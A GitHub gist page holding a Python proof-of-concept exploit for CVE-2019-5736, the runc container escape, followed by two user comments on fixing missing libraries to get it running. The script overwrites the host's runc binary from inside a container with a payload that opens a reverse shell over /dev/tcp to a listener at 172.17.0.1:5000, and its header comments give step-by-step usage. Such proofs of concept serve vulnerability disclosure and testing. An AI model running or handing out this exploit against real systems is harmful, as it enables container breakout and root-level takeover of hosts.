Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
port='5000'
payload=f'#!/bin/bash\necho "exec 5<>/dev/tcp/{host}/{port} && cat <&5|/bin/bash 2>&5 >&5"|/bin/bash\n'
target_file='/tmp/evil'
if __name__ == '__main__':
with open(target_file,'w') as evil:
evil.write('#!/proc/self/exe --criu')
os.chmod(target_file,stat.S_IXOTH)
found = 0
while found == 0:
procs = os.popen('ps -A -o pid')
for pid in procs:
pid = pid.strip()
if pid == 'PID': continue
if int(pid) > os.getpid():
try:
with open(f'/proc/{pid}/cmdline','r') as cmdline:
if cmdline.read().find('runc') >= 0:
found = pid
except FileNotFoundError:
continue
except ProcessLookupError:
continue
handle = -1
while handle == -1:
try:
handle = os.open(f'/proc/{found}/exe', os.O_PATH) #/proc/xxx/exe is fd to runcinit
except FileNotFoundError:
continue
except PermissionError:
continue
print('Got file handle')
write_handle = 0;
while write_handle == 0:
try:
write_handle = os.open(f'/proc/self/fd/{str(handle)}',os.O_WRONLY|os.O_TRUNC)
except OSError:
continue
print('Got write handle')
result = os.write(write_handle,str.encode(payload))
if result == len(payload):
print('Successfully wrote payload')
else:
print('Could not write')
@zoobab

This comment has been minimized.

Copy link

@zoobab zoobab commented Feb 14, 2019

I run the script inside a python:3 container, the host being an ubuntu xenial with docker 17.03:

$ docker exec -i c9c0f3989fd8 /tmp/evil
/proc/self/exe: error while loading shared libraries: libapparmor.so.1: cannot open shared object file: No such file or directory
@zoobab

This comment has been minimized.

Copy link

@zoobab zoobab commented Feb 14, 2019

I needed to do an apt-get install libseccomp2 libapparmor1 inside the container to solve the error.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment